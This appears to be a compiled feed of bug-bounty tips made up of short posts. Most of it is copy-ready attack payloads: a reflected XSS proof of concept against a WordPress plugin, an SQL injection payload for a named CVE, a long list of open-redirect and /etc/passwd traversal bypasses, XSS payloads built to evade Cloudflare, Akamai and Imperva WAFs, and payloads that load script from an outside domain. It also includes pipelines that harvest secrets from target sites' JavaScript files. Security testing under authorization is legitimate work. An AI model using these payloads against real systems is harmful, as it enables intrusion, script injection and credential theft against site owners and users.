Bug bounty Tips

CVE ID : CVE-2015-7377 System : wordpress Type : Reflected XSS Exploit :

Effects

Pie Register WordPress Plugin 2.0.18

XSS with base64 encode

http://localhost/wordpress/?page=pie-register&show_dash_widget=1&invitaion_code=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==

For copy the PoC 🔻

SQLI Injection CVE: 2024-36837 Payload: 0-3661)%20OR%20MAKE_SET(8165=8165,7677)%20AND%20(4334=4334 #BugBounty  #Tips

you can try this effective manual openredirect Bypass: 1. Null-byte injection:    - /google.com%00/    - //google.com%00   2. Base64 encoding variations:    - aHR0cDovL2dvb2dsZS5jb20=    - aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ==    - //base64:d3d3Lmdvb2dsZS5jb20=/   3. Case-sensitive variations:    - //GOOGLE.com/    - //GoOgLe.com/ 4. Overlong UTF-8 sequences:    - %C0%AE%C0%AE%2F (overlong encoding for ../)    - %C0%AF%C0%AF%2F%2Fgoogle.com 5. Mixed encoding schemes:    - /%68%74%74%70://google.com    - //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D    - //base64:%2F%2Fgoogle.com/ 6. Alternative domain notations:    - //google.com@127.0.0.1/    - //127.0.0.1.xip.io/    - //0x7F000001/ (hexadecimal IP) 7. Trailing special characters:    - //google.com/#/    - //google.com/;&/    - //google.com/?id=123&// 8. Octal IP address format:    - http://0177.0.0.1/    - http://00177.0000.0000.0001/ 9. IP address variants:    - http://3232235777 (decimal notation of an IP)    - http://0xC0A80001 (hex notation of IP)    - http://192.168.1.1/ 10. Path traversal with encoding:     - /..%252f..%252f..%252fetc/passwd     - /%252e%252e/%252e%252e/%252e%252e/etc/passwd     - /..%5c..%5c..%5cwindows/system32/cmd.exe 11. Alternate protocol inclusion:     - ftp://google.com/     - javascript:alert(1)//google.com 12. Protocol-relative URLs:     - :////google.com/     - :///google.com/ 13. Redirection edge cases:     - //google.com/?q=//bing.com/     - //google.com?q=https://another-site.com/ 14. IPv6 notation:     - http://[::1]/     - http://[::ffff:192.168.1.1]/     15. Double URL encoding:     - %252f%252fgoogle.com (encoded twice)     - %255cgoogle.com 16. Combined traversal & encoding:     - /%2E%2E/%2E%2E/etc/passwd     - /%2e%2e%5c%2e%2e/etc/passwd 17. Reverse DNS-based:     - https://google.com.reverselookup.com     - //lookup-reversed.google.com/ 18. Non-standard ports:     - http://google.com:81/     - https://google.com:444/ 19. Unicode obfuscation in paths:     - /%E2%80%8Egoogle.com/     - /%C2%A0google.com/ 20. Query parameters obfuscation:     - //google.com/?q=http://another-site.com/     - //google.com/?redirect=https://google.com/ 21. Using @ symbol for userinfo:     - https://admin:password@google.com/     - http://@google.com 22. Combination of userinfo and traversal:     - https://admin:password@google.com/../../etc/passwd

Cloudflare #XSS WAF Bypass by @nav1n0x Payload:

"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F 

#cybersec #bugbountytips #infosec

Reflected XSS Akami Waf Bypass in Redirect Parameter using HTTP Parameter Pollution and Double URL Encode:⚙️

/login?ReturnUrl=javascript:1&ReturnUrl=%2561%256c%2565%2572%2574%2528%2564%256f%2563%2575%256d%2565%256e%2574%252e%2564%256f%256d%2561%2569%256e%2529

A solid XSS payload that bypasses Imperva WAF ⚙️

<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click

#infosec #cybersec #bugbountytips

an XSS payload to bypass some waf & filters in Firefox

<input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;">

#infosec #cybersec #bugbountytips

Retrieves DNS records without any authentication

curl -s "https://api.hackertarget.com/dnslookup/?q=example.com"

Replace example.com with the target domain.

Pre-Auth RCE CyberPanel 0day by Chirag Artani 🔥 Useful video from our friend's channel about one of the freshest big vulnerabilities with Netlas search 🔎 We also recommend checking out his website and Twitter for more tips: 👉 Site: 3rag.com 👉 Twitter: x.com/Chirag99Artani

Find sensitive files using Wayback

waybackurls 123.com | grep - -color -E "1.xls | \\.tar.gz | \\.bak | \\.xml | \\.xlsx | \\.json | \\.rar | \\.pdf | \\.sql | \\.doc | \\.docx | \\.pptx | \\.txt | \\.zip | \\.tgz | \\.7z"

#bugbountytip #bugbounty #bugbountytips

a XSS payload with Alert Obfuscation, for bypass Regex filter

<img src="X" onerror=top[8680439..toString(30)](1337)> <script>top[8680439..toString(30)](1337)</script>

#infosec #cybersec #bugbountytip

Improve your #XSS reports! 🔥 Use our https://X55.is ✨ domain ✅ Replacing alert(1) '-import('//X55.is')-' <Svg OnLoad=import('//X55.is')> ✅ As href/src attribute <Base Href=//X55.is> <Script Src=//X55.is>

🇷🇺 Zero-Day by AI: Google Claims World First As AI Finds 0-Day Security Vulnerability. https://www.forbes.com/sites/daveywinder/2024/11/04/google-claims-world-first-as-ai-finds-0-day-security-vulnerability/

📌 Automated JavaScript Secret Detection 1 - Collect alive domains

docker run -v $(pwd):/src projectdiscovery/subfinder:latest -dL /src/domains -silent -o /src/subdomains
docker run -v $(pwd):/src projectdiscovery/dnsx:latest -l /src/subdomains -t 500 -retry 5 -silent -o /src/dnsx
docker run -v $(pwd):/src projectdiscovery/naabu:latest -l /src/dnsx -tp 1000 -ec -c 100 -rate 5000 -o /src/alive_ports
docker run -v $(pwd):/src projectdiscovery/httpx:latest -l /src/alive_ports -t 100 -rl 500 -o /src/alive_http_services

2 - Collect JS files for analysis (getJS)

docker run -v $(pwd):/src secsi/getjs --input /src/alive_http_services --complete --output /src/js_links

3 - Search for secrets in JS files

docker run -v $(pwd):/src projectdiscovery/nuclei:latest -l /src/js_links -tags token,tokens -es unknown -rl 500 -c 100 -silent -o /src/secret-results

or you can use trufflehog instead of nuclei

docker run -v $(pwd):/src secsi/getjs --input /src/alive_http_services --complete --output /src/js_links
docker run -v $(pwd):/src projectdiscovery/httpx:latest -l /src/js_links -t 100 -rl 500 -sr -srd /src/js_response
docker run --rm -it -v "$PWD:/src" trufflesecurity/trufflehog:latest filesystem /src/js_response/response --only-verified --concurrency=50

#bugbounty #bugbountytips

32 vulnerabilities in IBM Security Verify Access - IT Security Research by Pierre https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html

Template Engines Injection 101 https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756

Taming Post Claps https://medium.com/medium-eng/taming-post-claps-273d97ce1ced

7 Tips for bug bounty beginners https://blog.intigriti.com/hacking-tools/7-tips-for-bug-bounty-beginners

Easy logic bug that leaks the email for every user: https://medium.com/@banertheinrich/easy-logic-bug-that-leaks-the-email-for-every-user-ef2d9d0cf088?source=rss------bug_bounty-5